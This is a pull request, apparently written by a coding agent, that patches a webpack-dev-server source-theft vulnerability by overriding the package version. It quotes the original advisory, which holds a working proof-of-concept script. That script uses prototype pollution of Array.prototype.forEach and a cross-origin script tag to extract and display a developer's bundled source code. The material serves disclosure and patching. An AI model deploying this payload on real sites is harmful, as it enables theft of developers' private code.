#9017 Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site

[Copilot]

How the feature works? / How did you fix the issue?

• Summary: Dev-server could leak source when loaded cross-origin via prototype pollution on the runtime iterator.
• Changes:
  • Dependencies: override webpack-dev-server to latest patched v5.2.3.
  • Lockfile: refreshed to pull the patched dev-server release across workspaces.
• Example:

  {
    "overrides": {
      "nth-check": "^2.1.1",
      "webpack-dev-server": "^5.2.3"
    }
  }

Check list

• unit-tests written
• e2e-tests written
• documentation updated
• PR name follows the pattern #1234 – issue name
• branch name doesn't contain '#'
• PR is linked with the issue
• base branch (master or release/xx) is correct
• task status changed to "Code review"
• reviewers are notified about the pull request

Original prompt

---

This section details on the original issue you should resolve

<issue_title>Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site</issue_title>
<issue_description>### Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

Download [reproduction.zip](https://github.com/user-attachments/files/18426585/reproduction.zip) and extract it
Run `npm i`
Run `npx webpack-dev-server`
Open `https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/`
You can see the source code output in the document and the devtools console.

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}

const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const code = document.createElement('code')
    code.textContent = moduleList[key].toString()
    p.append(title, ':', document.createElement('br'), code)
    document.body.appendChild(p)
  }
})
document.head.appendChild(script)

This script uses the function generated by [renderRequire](https://github.com/webpack/webpack/blob/3919c844eca394d73ca930e4fc5506fb86e2b094/lib/javascript/JavascriptModulesPlugin.js#L1383).

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__.
It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Solution

Update webpack-dev-server package to latest version</issue_description>

Comments on the Issue (you are @copilot in this section)

• Fixes Refactor: webpack-dev-server users' source code may be stolen when they access a malicious web site #9017

---

✨ Let Copilot coding agent set things up for you — coding agent works faster and does higher quality work when set up for your repo.